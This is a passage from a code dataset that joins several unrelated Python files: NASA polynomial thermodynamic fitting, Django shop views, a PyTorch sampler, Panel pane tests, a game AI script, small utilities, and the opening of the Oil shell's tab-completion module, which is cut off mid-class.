self.T_mid = Ts[int(len(Ts)/2)]\n self.a_low = np.zeros(7)\n self.a_high = np.zeros(7)\n else:\n max_R2 = -1\n R2 = np.zeros_like(Ts)\n for i, T_mid in enumerate(Ts):\n #Need at least 5 points to fit the polynomial\n if i > 5 
and i < (len(Ts)-6):\n #Separate the temperature and heat capacities into low and high range\n (R2[i], a_low, a_high) = self._get_CpoR_R2(\n Ts=Ts, CpoR=CpoR, i_mid=i)\n max_R2 = max(R2)\n max_i = np.where(max_R2 == R2)[0][0]\n (max_R2, a_low_rev, a_high_rev) = self._get_CpoR_R2(\n Ts=Ts, CpoR=CpoR, i_mid=max_i)\n empty_arr = np.zeros(2)\n self.T_mid = Ts[max_i]\n self.a_low = np.concatenate((a_low_rev[::-1], empty_arr))\n self.a_high = np.concatenate((a_high_rev[::-1], empty_arr))\n\n def _get_CpoR_R2(self, Ts, CpoR, i_mid):\n \"\"\"Calculate the R2 polynomial regression value.\n\n Parameters\n ----------\n Ts : (N,) `numpy.ndarray_`\n Temperatures (K) to fit the polynomial\n CpoR : (N,) `numpy.ndarray_`\n Dimensionless heat capacities that correspond to T array\n i_mid : int\n Index that splits T and CpoR arrays into a lower and higher range\n Returns\n -------\n R2 : float)\n R2 value resulting from NASA polynomial fit to T and CpoR\n p_low : (5,) `numpy.ndarray_`\n Polynomial corresponding to lower range of data\n p_high : (5,) `numpy.ndarray_`\n Polynomial corresponding to high range of data\n \"\"\"\n T_low = Ts[:i_mid]\n CpoR_low = CpoR[:i_mid]\n T_high = Ts[i_mid:]\n CpoR_high = CpoR[i_mid:]\n #Fit the polynomial\n p_low = np.polyfit(x = T_low, y = CpoR_low, deg = 4)\n p_high = np.polyfit(x = T_high, y = CpoR_high, deg = 4)\n\n #Find the R2\n CpoR_low_fit = np.polyval(p_low, T_low)\n CpoR_high_fit = np.polyval(p_high, T_high)\n CpoR_fit = np.concatenate((CpoR_low_fit, CpoR_high_fit))\n CpoR_mean = np.mean(CpoR)\n ss_reg = np.sum((CpoR_fit - CpoR_mean)**2)\n ss_tot = np.sum((CpoR - CpoR_mean)**2)\n R2 = ss_reg / ss_tot\n\n return (R2, p_low, p_high)\n\n def fit_HoRT(self, T_ref, HoRT_ref):\n \"\"\"Fit a[5] coefficient in a_low and a_high attributes given the dimensionless enthalpy\n\n Parameters\n ----------\n T_ref : float\n Reference temperature in K\n HoRT_ref : float\n Reference dimensionless enthalpy\n \"\"\"\n T_mid = self.T_mid\n a6_low = (HoRT_ref - get_nasa_HoRT(a=self.a_low, T=T_ref))*T_ref\n a6_high = (HoRT_ref - get_nasa_HoRT(a=self.a_high, T=T_ref))*T_ref\n\n #Correcting for offset\n H_low_last_T = get_nasa_HoRT(a=self.a_low, T=T_mid) + a6_low/T_mid\n H_high_first_T = get_nasa_HoRT(a=self.a_high, T=T_mid) + a6_high/T_mid\n H_offset = H_low_last_T - H_high_first_T\n\n self.a_low[5] = a6_low\n self.a_high[5] = T_mid * (a6_high/T_mid + H_offset)\n\n def fit_SoR(self, T_ref, SoR_ref):\n \"\"\"Fit a[6] coefficient in a_low and a_high attributes given the\n dimensionless entropy\n\n Parameters\n ----------\n T_ref : float\n Reference temperature in K\n SoR_ref : float\n Reference dimensionless entropy\n \"\"\"\n T_mid = self.T_mid\n a7_low = SoR_ref - get_nasa_SoR(a=self.a_low, T=T_ref)\n a7_high = SoR_ref - get_nasa_SoR(a=self.a_high, T=T_ref)\n\n #Correcting for offset\n S_low_last_T = get_nasa_SoR(a=self.a_low, T=T_mid) + a7_low\n S_high_first_T = get_nasa_SoR(a=self.a_high, T=T_mid) + a7_high\n S_offset = S_low_last_T - S_high_first_T\n\n self.a_low[6] = a7_low\n self.a_high[6] = a7_high + S_offset\n\n\ndef get_nasa_CpoR(a, T):\n \"\"\"Calculate the dimensionless heat capacity using NASA polynomial form\n\n Parameters\n ----------\n a : (7,) `numpy.ndarray_`\n Coefficients of NASA polynomial\n T : float\n Temperature in K\n Returns\n -------\n CpoR: float\n Dimensionless heat capacity\n \"\"\"\n T_arr = np.array([1., T, T**2, T**3, T**4, 0., 0.])\n return np.dot(a, T_arr)\n\n\ndef get_nasa_HoRT(a, T):\n \"\"\"Calculate the dimensionless enthalpy using NASA polynomial 
form\n\n Parameters\n ----------\n a : (7,) `numpy.ndarray_`\n Coefficients of NASA polynomial\n T : float\n Temperature in K\n Returns\n -------\n HoRT : float\n Dimensionless enthalpy\n \"\"\"\n T_arr = np.array([1., T/2., (T**2)/3., (T**3)/4., (T**4)/5., 1./T, 0.])\n return np.dot(a, T_arr)\n\n\ndef get_nasa_SoR(a, T):\n \"\"\"Calculate the dimensionless entropy using NASA polynomial form\n\n Parameters\n ----------\n a : (7,) `numpy.ndarray_`\n Coefficients of NASA polynomial\n T : float\n Temperature in K\n Returns\n -------\n SoR : float\n Dimensionless entropy\n \"\"\"\n T_arr = np.array([np.log(T), T, (T**2)/2., (T**3)/3., (T**4)/4., 0., 1.])\n return np.dot(a, T_arr)\n\n\ndef get_nasa_GoRT(a, T):\n \"\"\"Calculate the dimensionless Gibbs free energy using NASA polynomial form\n\n Parameters\n ----------\n a : (7,) `numpy.ndarray_`\n Coefficients of NASA polynomial\n T : float\n Temperature in K\n Returns\n -------\n GoRT : float\n Dimensionless entropy\n \"\"\"\n return get_nasa_HoRT(a=a, T=T)-get_nasa_SoR(a=a, T=T)\n","sub_path":"PyMuTT/models/empirical_model.py","file_name":"empirical_model.py","file_ext":"py","file_size_in_byte":31723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"273168420","text":"from django.shortcuts import render\nfrom django.core.mail import send_mail\nfrom django.http import HttpResponse\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom polls.models import Shopitem\nfrom os.path import normpath, basename\n\n\ndef viewIndex(request):\n return render(request, \"index.html\", {})\n\ndef viewBrowse(request, filter, page):\n if filter == 'all':\n items = Shopitem.objects.all()\n # NOTE to self. This is retarded\n elif filter == 'for_baby':\n coliere_bebici = Shopitem.objects.filter(item_type='ColierBebici')\n bratari = Shopitem.objects.filter(item_type='Bratari')\n jucarii = Shopitem.objects.filter(item_type='Jucarii')\n materiale = Shopitem.objects.filter(item_type='Materiale')\n items = coliere_bebici | bratari | jucarii | materiale\n elif filter == 'for_mommy':\n coliere_mamici = Shopitem.objects.filter(item_type='ColierMamici')\n culori = Shopitem.objects.filter(item_type='Culori')\n items = coliere_mamici | culori\n else:\n items = Shopitem.objects.filter(item_type=filter)\n\n page = request.GET.get('page')\n paginator = Paginator(items, 9)\n\n try:\n render_items = paginator.page(page)\n except PageNotAnInteger:\n render_items = paginator.page(1)\n except EmptyPage:\n render_items = paginator.page(paginator.num_pages)\n\n return render(request, \"browse.html\", {\"items\": render_items})\n\ndef viewAboutUs(request):\n return render(request, \"about-us.html\", {})\n\ndef viewItemDetails(request, item_name):\n # Get item from the databases\n item = Shopitem.objects.get(name=item_name)\n return render(request, \"item-details.html\", {\"item\": item})\n\ndef viewGallery(request):\n return render(request, \"gallery.html\", {})\n\ndef viewArticle(request, id):\n text = \"Displaying article Number : %s\"%id\n return HttpResponse(text)\n","sub_path":"colierele/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"347769274","text":"import numpy as np\n\nfrom torch.utils.data.sampler import Sampler \n\nclass ShopSampler(Sampler):\n def __init__(self, labels, batch_size, maxiter):\n self.labels = np.array(labels)\n self.labels_unique = 
np.unique(labels)\n self.batch_size = batch_size\n self.maxiter = maxiter\n \n def __iter__(self):\n for i in range(self.__len__()):\n labels_in_batch = set()\n inds = np.array([], dtype=np.int)\n\n while inds.shape[0] < self.batch_size:\n sample_label = np.random.choice(self.labels_unique)\n if sample_label in labels_in_batch:\n continue\n\n labels_in_batch.add(sample_label)\n sample_label_ids = np.argwhere(np.in1d(self.labels, sample_label)).reshape(-1)\n subsample = np.random.permutation(sample_label_ids)\n subsize = len(subsample)\n if subsize <= 1:\n continue\n subsample_size = np.random.choice(range(subsize//2, subsize+1))\n subsample = subsample[:subsample_size]\n inds = np.append(inds, subsample)\n\n inds = inds[:self.batch_size]\n inds = np.random.permutation(inds)\n yield list(inds)\n\n def __len__(self):\n return self.maxiter","sub_path":"samplers_shop.py","file_name":"samplers_shop.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"5311702","text":"import time\nfrom image_server import ImageServer\nfrom lat_lng import LatLng\nfrom neighborhood import Neighborhood\nfrom place_data_server import PlaceDataServer\n\n\nclass Runner:\n\n def run(self):\n place_data_server = PlaceDataServer()\n try:\n place_data_server.initialize_server(\"place_data.csv\")\n except IOError as pds_io_exception:\n print(\"Exception thrown populating PDS data: %s\" % pds_io_exception)\n\n image_server = ImageServer()\n try:\n image_server.initialize_server(\"image_data.csv\")\n except IOError as is_io_exception:\n print(\"Exception thrown populating IS data: %s\" % is_io_exception)\n\n neighborhood = Neighborhood(place_data_server, image_server)\n\n while True:\n print(\"~~~~~~~~~~~A new Server is running.!!\")\n places_found = place_data_server.get_place_data_from_name(\"Starbucks\")\n for place in places_found:\n print(\"***: %s\" % place)\n print(\"***: %s\" % place_data_server.get_place_data(\n \"Starbucks\", LatLng(100, -200)))\n print(\"***: %s\" % image_server.get_image_for_place(\n \"Starbucks\", LatLng(100, -200)))\n print(\"*** get_nearby_places: %s\" % place_data_server.get_nearby_places(\n LatLng(100, -200), 2))\n print(\"*** get_places: %s\" % neighborhood.get_places(LatLng(100, -200), 1))\n\n # Feel free to add more print statements here in order to test your code\n # and see how things are working.\n time.sleep(11)\n\n\nif __name__ == \"__main__\":\n try:\n Runner().run()\n except KeyboardInterrupt:\n print(\"~~~~~~~~~~~Server stops.\")\n","sub_path":"medium/mediumCode/c/pocketgems/neighborhood_python/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"587289173","text":"''' \nWrite a program that reads an hourly wage and average number of hours worked per week \nand displays the total yearly pay.\n'''\n\nhourly_wage = int(input(\"What's your hourly wage?: \"))\naverage_hours = int(input(\"How many hours do you usually work per week?: \"))\n\n\nweekly_wage = hourly_wage * average_hours\n\nannual_wage = weekly_wage * 52\n\nprint(\"Your annual wage is\", annual_wage)","sub_path":"python/think_like_a_programmer/ch3-variables/wage_calculator.py","file_name":"wage_calculator.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"89482401","text":"from __future__ import 
+{"seq_id":"89482401","text":"from __future__ import absolute_import\n\nfrom base64 import b64decode\nimport pytest\n\nfrom bokeh.models import (Div, Row as BkRow, WidgetBox as BkWidgetBox,\n GlyphRenderer, Circle, Line)\nfrom bokeh.plotting import Figure\nfrom panel.pane import (Pane, PaneBase, Bokeh, HoloViews, Matplotlib,\n HTML, Str, PNG, JPG, GIF)\n\ntry:\n import holoviews as hv\nexcept:\n hv = None\nhv_available = pytest.mark.skipif(hv is None, reason=\"requires holoviews\")\n\ntry:\n import matplotlib as mpl\n mpl.use('Agg')\nexcept:\n mpl = None\nmpl_available = pytest.mark.skipif(mpl is None, reason=\"requires matplotlib\")\n\nfrom .fixtures import mpl_figure\nfrom .test_layout import get_div\n\n\ndef test_get_bokeh_pane_type():\n div = Div()\n assert PaneBase.get_pane_type(div) is Bokeh\n\n\ndef test_bokeh_pane(document, comm):\n div = Div()\n pane = Pane(div)\n\n # Create pane\n row = pane._get_root(document, comm=comm)\n assert isinstance(row, BkRow)\n assert len(row.children) == 1\n model = row.children[0]\n assert model.ref['id'] in pane._callbacks\n assert get_div(model) is div\n\n # Replace Pane.object\n div2 = Div()\n pane.object = div2\n new_model = row.children[0]\n assert get_div(new_model) is div2\n assert new_model.ref['id'] in pane._callbacks\n assert model.ref['id'] not in pane._callbacks\n\n # Cleanup\n pane._cleanup(new_model)\n assert pane._callbacks == {}\n\n\n@hv_available\ndef test_get_holoviews_pane_type():\n curve = hv.Curve([1, 2, 3])\n assert PaneBase.get_pane_type(curve) is HoloViews\n\n\n@pytest.mark.usefixtures(\"hv_mpl\")\n@mpl_available\n@hv_available\ndef test_holoviews_pane_mpl_renderer(document, comm):\n curve = hv.Curve([1, 2, 3])\n pane = Pane(curve)\n\n # Create pane\n row = pane._get_root(document, comm=comm)\n assert isinstance(row, BkRow)\n assert len(row.children) == 1\n assert len(pane._callbacks) == 1\n model = row.children[0]\n assert isinstance(model, BkWidgetBox)\n div = model.children[0]\n assert isinstance(div, Div)\n assert '<img' in div.text\n\n\ndef test_get_html_pane_type():\n assert PaneBase.get_pane_type(\"<h1>Test</h1>\") is HTML\n\n\ndef test_html_pane(document, comm):\n pane = Pane(\"<h1>Test</h1>\")\n\n # Create pane\n row = pane._get_root(document, comm=comm)\n assert isinstance(row, BkRow)\n assert len(row.children) == 1\n model = row.children[0]\n assert model.ref['id'] in pane._callbacks\n div = get_div(model)\n assert div.text == \"<h1>Test</h1>\"\n\n # Replace Pane.object\n pane.object = \"<h2>Test</h2>\"\n model = row.children[0]\n assert div is get_div(model)\n assert model.ref['id'] in pane._callbacks\n assert div.text == \"<h2>Test</h2>\"\n\n # Cleanup\n pane._cleanup(model)\n assert pane._callbacks == {}\n\n\ndef test_string_pane(document, comm):\n pane = Str(\"<h1>Test</h1>\")\n\n # Create pane\n row = pane._get_root(document, comm=comm)\n assert isinstance(row, BkRow)\n assert len(row.children) == 1\n model = row.children[0]\n assert model.ref['id'] in pane._callbacks\n div = get_div(model)\n assert div.text == \"<pre>&lt;h1&gt;Test&lt;/h1&gt;</pre>\"\n\n # Replace Pane.object\n pane.object = \"<h2>Test</h2>\"\n model = row.children[0]\n assert div is get_div(model)\n assert model.ref['id'] in pane._callbacks\n assert div.text == \"<pre>&lt;h2&gt;Test&lt;/h2&gt;</pre>\"\n\n # Cleanup\n pane._cleanup(model)\n assert pane._callbacks == {}\n\n\ntwopixel = dict(\\\n gif = b'R0lGODlhAgABAPAAAEQ6Q2NYYCH5BAAAAAAAIf8LSW1hZ2VNYWdpY2sNZ2FtbWE' + \\\n b'9MC40NTQ1NQAsAAAAAAIAAQAAAgIMCgA7',\n png = b'iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAYAAAD0In+KAAAAFElEQVQIHQEJAPb' + \\\n b'/AWNYYP/h4uMAFL0EwlEn99gAAAAASUVORK5CYII=',\n jpg = b'/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQE' + \\\n b'BAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQ' + \\\n b'EBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA' + \\\n b'QEBAQEBAQEBAQEBAQEBAQH/wAARCAABAAIDAREAAhEBAxEB/8QAFAABAAAAAAAA' + \\\n b'AAAAAAAAAAAACf/EABoQAAEFAQAAAAAAAAAAAAAAAAYABAU2dbX/xAAVAQEBAAA' + \\\n b'AAAAAAAAAAAAAAAAFBv/EABkRAAEFAAAAAAAAAAAAAAAAAAEAAjFxsf/aAAwDAQ' + \\\n b'ACEQMRAD8AA0qs5HvTHQcJdsChioXSbOr/2Q==')\n\ndef test_imgshape():\n for t in [PNG, JPG, GIF]:\n w,h = t._imgshape(b64decode(twopixel[t.name.lower()]))\n assert w == 2\n assert h == 1\n","sub_path":"panel/tests/test_panes.py","file_name":"test_panes.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"430673196","text":"import App\n\ndef CreateAI(pShip):\n\t#########################################\n\t# Creating PlainAI StayBoyStay at (114, 112)\n\tpStayBoyStay = App.PlainAI_Create(pShip, \"StayBoyStay\")\n\tpStayBoyStay.SetScriptModule(\"Stay\")\n\tpStayBoyStay.SetInterruptable(1)\n\t# Done creating PlainAI StayBoyStay\n\t#########################################\n\t#########################################\n\t# Creating ConditionalAI GalorsNotClose at (116, 171)\n\t## Conditions:\n\t#### Condition GalorsInRange\n\tpGalorsInRange = App.ConditionScript_Create(\"Conditions.ConditionInRange\", \"ConditionInRange\", 400, pShip.GetName(), \"Galor 1\", \"Galor 2\")\n\t## Evaluation function:\n\tdef EvalFunc(bGalorsInRange):\n\t\tACTIVE = App.ArtificialIntelligence.US_ACTIVE\n\t\tDORMANT = App.ArtificialIntelligence.US_DORMANT\n\t\tDONE = App.ArtificialIntelligence.US_DONE\n\t\tif bGalorsInRange:\n\t\t\treturn DONE\n\t\treturn ACTIVE\n\t## The ConditionalAI:\n\tpGalorsNotClose = App.ConditionalAI_Create(pShip, \"GalorsNotClose\")\n\tpGalorsNotClose.SetInterruptable(1)\n\tpGalorsNotClose.SetContainedAI(pStayBoyStay)\n\tpGalorsNotClose.AddCondition(pGalorsInRange)\n\tpGalorsNotClose.SetEvaluationFunction(EvalFunc)\n\t# Done creating ConditionalAI GalorsNotClose\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI AttackGalors at (162, 218)\n\timport AI.Compound.BasicAttack\n\tpAttackGalors = AI.Compound.BasicAttack.CreateAI(pShip, \"Galor 1\", \"Galor 2\", Difficulty = 0.2)\n\t# Done creating CompoundAI AttackGalors\n\t#########################################\n\t#########################################\n\t# Creating SequenceAI Sequence at (15, 262)\n\tpSequence = App.SequenceAI_Create(pShip, \"Sequence\")\n\tpSequence.SetInterruptable(1)\n\tpSequence.SetLoopCount(1)\n\tpSequence.SetResetIfInterrupted(1)\n\tpSequence.SetDoubleCheckAllDone(0)\n\tpSequence.SetSkipDormant(0)\n\t# SeqBlock is at (130, 265)\n\tpSequence.AddAI(pGalorsNotClose)\n\tpSequence.AddAI(pAttackGalors)\n\t# Done creating SequenceAI Sequence\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI RedAlert at (12, 308)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AlertLevel(App.ShipClass.RED_ALERT)\n\t## The PreprocessingAI:\n\tpRedAlert = App.PreprocessingAI_Create(pShip, \"RedAlert\")\n\tpRedAlert.SetInterruptable(1)\n\tpRedAlert.SetPreprocessingMethod(pScript, \"Update\")\n\tpRedAlert.SetContainedAI(pSequence)\n\t# Done creating PreprocessingAI RedAlert\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI AvoidObstacles at (13, 355)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AvoidObstacles()\n\t## The PreprocessingAI:\n\tpAvoidObstacles = App.PreprocessingAI_Create(pShip, \"AvoidObstacles\")\n\tpAvoidObstacles.SetInterruptable(1)\n\tpAvoidObstacles.SetPreprocessingMethod(pScript, \"Update\")\n\tpAvoidObstacles.SetContainedAI(pRedAlert)\n\t# Done creating PreprocessingAI AvoidObstacles\n\t#########################################\n\treturn pAvoidObstacles\n","sub_path":"scripts/Maelstrom/Episode2/E2M2/E2M2_AI_MarauderAttack.py","file_name":"E2M2_AI_MarauderAttack.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"46414218","text":"'''\n@Author: hua\n@Date: 2019-02-10 09:55:10\n@LastEditors: hua\n@LastEditTime: 2019-05-24 15:40:23\n'''\n''' author:hua\n date:2018.2.6\n Base model that wraps some common helper methods \n'''\nimport logging\nfrom app.Vendor.Code import Code\n\nclass Base():\n\n \"\"\" \n * Format pagination\n * @param int page\n * @param int size\n * @param int total\n * @return dict \n \"\"\"\n @staticmethod\n def formatPaged(page, size, total):\n if int(total) > int(page) * int(size):\n more = 1\n else:\n more = 0\n return {\n 'total': int(total),\n 'page': int(page),\n 'size': int(size),\n 'more': more\n }\n\n \"\"\" \n * Format a response body\n * @param dict data\n * @return dict\n \"\"\"\n @staticmethod\n def formatBody(data={}, msg='', show=True):\n dataformat = {}\n dataformat['error_code'] = Code.SUCCESS\n dataformat['data'] = data\n dataformat['msg'] = msg\n dataformat['show'] = show\n return dataformat\n\n \"\"\" \n * Format an error response body\n * @param int code\n * @param string message\n * @return dict\n \"\"\"\n @staticmethod\n def formatError(code, message='', show=True):\n if code == Code.BAD_REQUEST:\n message = 'Bad request.'\n elif code == Code.NOT_FOUND:\n message = 'No result matched.'\n body = {}\n body['error'] = True\n body['error_code'] = code\n body['msg'] = message\n body['show'] = show\n return body\n\n\n\n\n","sub_path":"chatApi/app/Models/Base.py","file_name":"Base.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"133082395","text":"# Vector subtraction\nimport numpy as np\nimport matplotlib.pyplot as plt\n\na = np.array([4, 1])\nb = np.array([-2, 3])\n\nprint(a - b)\n\nprint()\n\nprint(np.subtract(a, b))\n\nprint()\n\nsub = a - b\n\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\n\n# Draw vector a so that it starts at the origin.\nax.quiver(0, 0, a[0], a[1], angles='xy', scale_units='xy', scale=1)\nax.text(a[0], a[1], \"a\", size=15)\n\n# Draw vector b in the opposite direction, starting at the tip of vector a.\nax.quiver(a[0], a[1], -b[0], -b[1], angles='xy', scale_units='xy', scale=1)\nax.text(a[0] - b[0], a[1] - b[1], \"-b\", size=15)\n\n# Plotting the subtraction of the two vectors gives the line connecting the start point of vector a and the end point of vector b.\nax.quiver(0, 0, sub[0], sub[1], angles='xy', scale_units='xy', scale=1, color='red')\nax.text(sub[0] * 0.5 + 0.3, sub[1] * 0.5, \"a - b\", size=15, color='red')\n\nax.set_xticks(range(-2, 8))\nax.set_yticks(range(-4, 5))\nax.grid()\nax.set_axisbelow(True)\nax.set_aspect('equal', adjustable='box')\n\nax.spines['left'].set_position('zero')\nax.spines['bottom'].set_position('zero')\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\n\nplt.show()","sub_path":"선형대수 3일차/실습/matplotlibs8.py","file_name":"matplotlibs8.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"240992797","text":"import time\r\nimport sys\r\nfrom datetime import datetime\r\n\r\ndef save(playerName, playerState, playerLife):\r\n\tdate = '; {0}'.format(datetime.ctime(datetime.now()))\r\n\r\n\twith open('save.dat', 'w') as f:\r\n\t\tf.write('{0}\\nName: {1}\\nLevel: {2}\\nLife: {3}'.format(\r\n\t\t\tdate, playerName, playerState, playerLife))\r\n\r\ndef load():\r\n\tstateList = []\r\n\tstateDict = {}\r\n\r\n\twith open('save.dat', 'r') as f:\r\n\t\tstateList = f.readlines()\r\n\r\n\tfor line in stateList:\r\n\t\tif line is stateList[0]:\r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tdictVal = line.split(' ')\r\n\t\t\tstateDict[dictVal[0].strip(':')] = dictVal[1].strip('\\n')\r\n\r\n\treturn stateDict\r\n\r\nif __name__ == \"__main__\":\r\n\tsys.exit(0)","sub_path":"main.py3","file_name":"main.py3","file_ext":"py3","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"239341709","text":"#!/usr/bin/env python\n# Copyright 2016 Andy Chu. All rights reserved.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n\"\"\"\ncompletion.py - Tab completion.\n\nArchitecture:\n\nCompletion should run in threads? For two reasons:\n\n- Completion can be slow -- e.g. completion for distributed resources\n- Because readline has a weird interface, and then you can implement\n \"iterators\" in C++ or oil. They just push onto a PIPE. Use a netstring\n protocol and self-pipe?\n- completion can be in another process anyway?\n\nDoes that mean the user code gets run in an entirely separate interpreter? The\nwhole lexer/parser/cmd_exec combo has to be thread-safe. Does it get a copy of\nthe same startup state?\n\nFeatures TODO:\n - complete flags after alias expansion\n - complete history expansions like zsh\n - complete flags for all builtins, using frontend/args.py?\n - might need a special error token\n\nbash note: most of this stuff is in pcomplete.c and bashline.c (4K lines!).\nUses ITEMLIST with a bunch of flags.\n\"\"\"\nfrom __future__ import print_function\n\nimport posix\nimport pwd\nimport time\n\nfrom core import ui\nfrom core import util\nfrom core.meta import (\n Id, REDIR_ARG_TYPES, syntax_asdl, runtime_asdl, types_asdl)\nfrom frontend import reader\nfrom pylib import os_path\nfrom osh import word\nfrom osh import state\n\nimport libc\n\ncommand_e = syntax_asdl.command_e\nword_part_e = syntax_asdl.word_part_e\nredir_e = syntax_asdl.redir_e\nvalue_e = runtime_asdl.value_e\nredir_arg_type_e = types_asdl.redir_arg_type_e\n\nlog = util.log\n\n\n# To quote completion candidates.\n# ! is for history expansion, which only happens interactively, but\n# completion only does too.\n# *?[] are for globs\n# {} are for brace expansion\n# ~ in filenames should be quoted\n#\n# TODO: Also escape tabs as \\t and newlines at \\n?\nSHELL_META_CHARS = r' ~`!$&|;()\\\"*?[]{}<>' + \"'\"\n\n\n\nclass _RetryCompletion(Exception):\n \"\"\"For the 'exit 124' protocol.\"\"\"\n pass\n\n\nCH_Break, CH_Other = xrange(2) # Character types\nST_Begin, ST_Break, ST_Other = xrange(3) # States\n\n# State machine definition.\n_TRANSITIONS = {\n # (state, char) -> (new state, emit span)\n (ST_Begin, CH_Break): (ST_Break, False),\n (ST_Begin, CH_Other): (ST_Other, False),\n\n (ST_Break, CH_Break): (ST_Break, False),\n (ST_Break, CH_Other): (ST_Other, True),\n\n (ST_Other, CH_Break): (ST_Break, True),\n (ST_Other, CH_Other): (ST_Other, False),\n}\n\ndef AdjustArg(arg, break_chars, argv_out):\n end_indices = [] # stores the end of each span\n state = ST_Begin\n last_i = 0\n for i, c in enumerate(arg):\n ch = CH_Break if c in break_chars else CH_Other\n state, emit_span = _TRANSITIONS[state, ch]\n if emit_span:\n end_indices.append(i)\n\n # Always emit a span at the end (even for empty string)\n end_indices.append(len(arg))\n\n begin = 0\n for end in end_indices:\n argv_out.append(arg[begin:end])\n begin = end\n\n\nclass NullCompleter(object):\n\n def Matches(self, comp):\n return []\n\n\n# NOTE: How to create temporary options? With copy.deepcopy()?\n# We might want that as a test for OVM. Copying is similar to garbage\n# collection in that you walk a graph.\n\n\n# These values should never be mutated.\n_DEFAULT_OPTS = {}\n_DO_NOTHING = (_DEFAULT_OPTS, NullCompleter())\n\n\nclass State(object):\n \"\"\"Stores the state of the CURRENT completion.\"\"\"\n\n def __init__(self):\n # For the IN-PROGRESS completion.\n self.currently_completing = False\n # should be SET to a COPY of the registration options by the completer.\n self.dynamic_opts = None\n\n\nclass Lookup(object):\n \"\"\"Stores completion hooks registered by the user.\"\"\"\n\n def __init__(self):\n # command name -> UserSpec\n # Pseudo-commands __first and __fallback are for -E and -D.\n self.lookup = {\n '__fallback': _DO_NOTHING,\n '__first': _DO_NOTHING,\n }\n\n # So you can register *.sh, unlike bash. List of (glob, [actions]),\n # searched linearly.\n self.patterns = []\n\n def __str__(self):\n return '<Lookup %s>' % self.lookup\n\n def PrintSpecs(self):\n \"\"\"For 'complete' without args.\"\"\"\n for name in sorted(self.lookup):\n base_opts, user_spec = self.lookup[name]\n print('%-15s %s %s' % (name, base_opts, user_spec))\n print('---')\n for pat, spec in self.patterns:\n print('%s = %s' % (pat, spec))\n\n def RegisterName(self, name, base_opts, user_spec):\n \"\"\"Register a completion action with a name.\n Used by the 'complete' builtin.\n \"\"\"\n self.lookup[name] = (base_opts, user_spec)\n\n def RegisterGlob(self, glob_pat, base_opts, user_spec):\n self.patterns.append((glob_pat, base_opts, user_spec))\n\n def GetFirstSpec(self):\n return self.lookup['__first']\n\n def GetSpecForName(self, argv0):\n \"\"\"\n Args:\n argv0: A finished argv0 to lookup\n \"\"\"\n user_spec = self.lookup.get(argv0) # NOTE: Could be ''\n if user_spec:\n return user_spec\n\n key = os_path.basename(argv0)\n actions = self.lookup.get(key)\n if user_spec:\n return user_spec\n\n for glob_pat, base_opts, user_spec in self.patterns:\n #log('Matching %r %r', key, glob_pat)\n if libc.fnmatch(glob_pat, key):\n return base_opts, user_spec\n\n # Nothing matched\n return self.lookup['__fallback']\n\n\nclass Api(object):\n\n def __init__(self, line='', begin=0, end=0):\n \"\"\"\n Args:\n index: if -1, then we're running through compgen\n \"\"\"\n self.line = line\n self.begin = begin\n self.end = end\n # NOTE: COMP_WORDBREAKS is initialized in Mem().\n\n # NOTE: to_complete could be 'cur'\n def Update(self, first='', to_complete='', prev='', index=0,\n partial_argv=None):\n \"\"\"Added after we've done parsing.\"\"\"\n self.first = first\n self.to_complete = to_complete\n self.prev = prev\n self.index = index # COMP_CWORD\n # COMP_ARGV and COMP_WORDS can be derived from this\n self.partial_argv = partial_argv or []\n\n def __repr__(self):\n \"\"\"For testing\"\"\"\n return '<Api %r %d-%d>' % (self.line, self.begin, self.end)\n\n\n#\n# Actions\n#\n\nclass CompletionAction(object):\n \"\"\"Returns a list of words.\n\n Function\n Literal words\n \"\"\"\n def __init__(self):\n pass\n\n def Matches(self, comp):\n pass\n\n def __repr__(self):\n return self.__class__.__name__\n\n\nclass UsersAction(CompletionAction):\n \"\"\"complete -A user\"\"\"\n\n def Matches(self, comp):\n for u in pwd.getpwall():\n name = u.pw_name\n if name.startswith(comp.to_complete):\n yield name\n\n\nclass TestAction(CompletionAction):\n def __init__(self, words, delay=None):\n 